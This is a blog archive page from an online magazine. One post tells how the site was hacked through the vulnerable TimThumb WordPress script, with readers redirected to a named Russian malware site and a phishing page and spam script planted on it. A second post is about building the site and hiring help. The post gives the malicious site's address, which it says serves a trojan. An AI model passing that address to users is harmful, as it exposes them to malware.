Tag Archive | "wordpress"

The story of the New Nation hack

The story of the New Nation hack

Tags: , , , ,


a rough sketch of the fucker that broke our site.

Thanks for sticking around guys. When New Nation was hacked earlier this month, we were rendered inaccessible for a few days, and then some. So for those of you who’re still reading us despite being potentially hit by a virus while accessing the site, you deserve a big bear hug. :)

On the 4th of September, New Nation was compromised via 2 possible attack vectors, XSS (Cross Site Scripting) and an outdated version of a very popular script, which ended up redirecting readers away from our articles to a malicious russian site: http:// id-software . ru /secnow/index.php. How malicious? We’re not entirely sure, but according to norton the site serves a trojan horse as a payload.

The most likely attack vector was a web-based attack, executed via a vulnerable wordpress plugin called TimThumb, which is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Obviously because it makes life alot easier for non-technical douches like us, its a highly popular script and thus led to the downing of multiple sites on the day itself, including New Nation. Click here for a more technical analysis of the Timthumb.php hack, and here for a non-exhaustive list of plugins. For themes that utilitse Timthumb and are thus vulnerable, click here.

In addition to that, a hacker had nestled a phishing site nicely within New Nation, targetted at Lloyds bank no less. We also had a nasty perl script spewing out spam mail like no tomorrow. So some unfortunate people somewhere were getting emails from [email protected], [email protected], [email protected] and so forth.

Our original host failed to detect the outgoing spam on their servers despite us repeatedly asking for checks. And so we moved house to Amazon Web Services which promptly informed us of the spam.

A site vulnerability assessment was done and at this time by a couple of security monkeys with a local IT security interest group and seems nice and good.

At this point if you’re still getting the google malware detector, you shouldn’t be. Because we’ve cleansed and cleared the site with the google webmaster and have been certified safe for surfing. Clear your cache, deleted your browsing history and you should be good to go.

For further reading:

Phishing: http://en.wikipedia.org/wiki/Phishing

XSS: http://en.wikipedia.org/wiki/Cross-site_scripting

XSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery

Phase one

Phase one

Tags: , , ,


Fang Shihan

It’s Christmas eve and I’m sitting at the dinner table fiddling around with css code. Poor poor arts graduate. Boohoo.

So they say, a blog template is supposed to be the least of your problems…NOT! Then again, we’re not really creating a blog, we’re creating an online magazine here, which brings alot more internal infrastructure problems. Took me a day to create guidelines on how to file photos, for example. If we don’t set the ground rules right, it’ll be a pain to search through 1000 photos every time we need to post an article.

I’m thinking of going for a wordpress conference in Bandung next year:
http://wordcampindonesia.com/ just to not feel so stupid whenever I can’t fix stuff.

But bitching aside, we do need some help with the tech side of things. Interested in being part of a young, crazy workaholic team that aims to create the first commercial online magazine in Singapore geared towards current affairs? We’re looking for people who have one or more of the following:

1) Knowledge of wordpress
2) Knowledge of .css code
3) Expertise in cloud computing
4) A creative flair in web design

Look for us. Money is negotiable, but we assure you, once you’re in it, you know it’ll be for more than just the money.

[p.s. as you can see, even the thumbnail isn’t loading properly. Poor geek’s head got lopped off at the top.]